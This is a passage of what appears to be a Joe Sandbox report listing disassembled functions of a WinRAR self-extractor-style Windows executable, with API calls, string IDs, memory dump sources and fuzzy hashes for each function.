                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextWindow
                                                                                        • String ID: LICENSEDLG
                                                                                        • API String ID: 2478532303-2177901306
                                                                                        • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                        • Instruction ID: 0fb30094362acfa5d0ae684aeaad5c8e563b6e6657fe18acd111204aa12e1a12
                                                                                        • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                                        • Instruction Fuzzy Hash: CC416325E08A5282FB64CB17E8547791BA1AFE4F84F044135F92E83BD4EF7CE54A8300
                                                                                        Function 00007FF6FE19B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                        • API String ID: 2915667086-2207617598
                                                                                        • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                        • Instruction ID: 835941d4451df956dae3a25905658ab8f1667678a258eb28d6ceb992bdad690a
                                                                                        • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                                        • Instruction Fuzzy Hash: C231F624E0AA4A80FB24CF17E9585792BA1AFE5B90F045135F86EC77E8FE7CF5458204
                                                                                        Function 00007FF6FE1A87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: $
                                                                                        • API String ID: 3668304517-227171996
                                                                                        • Opcode ID: d36d35de43213f8ad8c7125845a4b947406c7f49c70316df392fd487e7cb45ba
                                                                                        • Instruction ID: 8736331ee4c4d4c745339ef82da44396d422e9140b9d6122239c17f3f5c6c1c0
                                                                                        • Opcode Fuzzy Hash: d36d35de43213f8ad8c7125845a4b947406c7f49c70316df392fd487e7cb45ba
                                                                                        • Instruction Fuzzy Hash: E1F1AD62F1574640EF10DB66D4481BC2B62ABE4FA8F505231EA7D93BD9EE7CE188C340
                                                                                        Function 00007FF6FE1B57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 2940173790-393685449
                                                                                        • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                        • Instruction ID: 21af108181a095064492407cb24469732c940d6e1000f77d88f29028fa51c47e
                                                                                        • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                                        • Instruction Fuzzy Hash: 5DE1C472D087828AE710DF66D4803AD7BA6FBA5758F144135EAAD877D6EF38E481C700
                                                                                        Function 00007FF6FE194F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocClearStringVariant
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 1959693985-3505469590
                                                                                        • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction ID: b1c1c8b0d54d2993566e42d6e35a0b61ec1654a34b72e1b9d2caa48787dcc0a6
                                                                                        • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                                        • Instruction Fuzzy Hash: DA712E76F14A1585EB20CF6AD8905ED7BB4FB98B98B045132EA5D83BA8EF3CD144C310
                                                                                        Function 00007FF6FE1B72EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B7371
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B737F
                                                                                        • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73A9
                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73EF
                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF6FE1B74F3,?,?,?,00007FF6FE1B525E,?,?,?,00007FF6FE1B5219), ref: 00007FF6FE1B73FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction ID: 8b9cd580db1ca52638a5f1fec28390caf8ee5d3944bc722543a81112843320ac
                                                                                        • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                                        • Instruction Fuzzy Hash: B6318E21F1B64281EB11EB17A8005B92A95FFA4BA0F194635ED2DCA7E0EF3CE4598710
                                                                                        Function 00007FF6FE1B1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B162B
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B1648
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B1664
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction ID: 7f6f371c4dbbd964aec900ee623640618cf29ded79570e55436c3157d5cad7a1
                                                                                        • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                                        • Instruction Fuzzy Hash: 75113020F19B4285FF64CB07A9401B41AA96FE8798F4E4436F83DC67D5FE7CB4548600
                                                                                        Function 00007FF6FE19ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1951A4: GetVersionExW.KERNEL32 ref: 00007FF6FE1951D5
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19ED8C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19ED98
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDA8
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDB6
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EDC4
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6FE185AB4), ref: 00007FF6FE19EE05
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction ID: 7980982263efd5d82b12a5cca5fc4429067e0c036ff572660a1ce6d1d7cd0cf5
                                                                                        • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                                        • Instruction Fuzzy Hash: C0517FB2F106518AEB14CFB9D8841AC7BB1F798788B604036EE1D97B98EF38E555C700
                                                                                        Function 00007FF6FE19F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2092733347-0
                                                                                        • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction ID: 3672ad94516d0cc5f012fe0ec4d2ff7b18a179491d141bfea815766c48b96027
                                                                                        • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                                        • Instruction Fuzzy Hash: C7314966F10A519AEB00CFB5D8801AC3771FB58758B54503AEE1ED3A98EF38D895C300
                                                                                        Function 00007FF6FE197918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: .rar$exe$rar$sfx
                                                                                        • API String ID: 3668304517-630704357
                                                                                        • Opcode ID: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                        • Instruction ID: a9e3e80804151c7f3677e6e4d6250490890462aae60dea1a2602ce4fed3c5bf1
                                                                                        • Opcode Fuzzy Hash: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                                                                                        • Instruction Fuzzy Hash: 77A17F22E1960640EB04DB26D4952BC2B61BFE5BE8F541235E93E876E9EF3CE549C340
                                                                                        Function 00007FF6FE1B5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: abort$CallEncodePointerTranslator
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 2889003569-2084237596
                                                                                        • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction ID: 5c6ef4bf6780479396ef95fa6771e97c48217f10e0b15b35127a61e37c102ec2
                                                                                        • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                        • Instruction Fuzzy Hash: 1B919F73E08B818AE711CB66E4802ADBBA1F794788F144129FF5D97B95EF38D195CB00
                                                                                        Function 00007FF6FE1B4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm$f
                                                                                        • API String ID: 2395640692-629598281
                                                                                        • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction ID: d1579c9f88df29eb2fe5fdd1d473adb56aef35e9b1afe24bfd2cb09d59aa12af
                                                                                        • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction Fuzzy Hash: 1B51A332F1960286DB54CF17E444A6D3B66FBA4B88F518134FA2A877C9EF78E8418740
                                                                                        Function 00007FF6FE18CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 2102711378-639343689
                                                                                        • Opcode ID: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                        • Instruction ID: 6b3c3e86871ccd3fe0c95bf182eac67785b84c4d65a04bce01e548a83b348c23
                                                                                        • Opcode Fuzzy Hash: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                                                                                        • Instruction Fuzzy Hash: 4651C362F1874685FB10DB66D8412BD2B61AFE57A4F000535FE2D97AD6FE3CA989C200
                                                                                        Function 00007FF6FE1A7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Rect
                                                                                        • String ID: RarHtmlClassName
                                                                                        • API String ID: 2396740005-1658105358
                                                                                        • Opcode ID: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction ID: e77a3f81afaf55551dc88cfe03b287f7b9c57c5896afc765efbd4ee3e0f42b96
                                                                                        • Opcode Fuzzy Hash: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction Fuzzy Hash: 75517322E09B4286EB24DF27E45437A6B61FBE5B80F404435FA5E87B95EF3CE5498700
                                                                                        Function 00007FF6FE1AFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 3540648995-3493335439
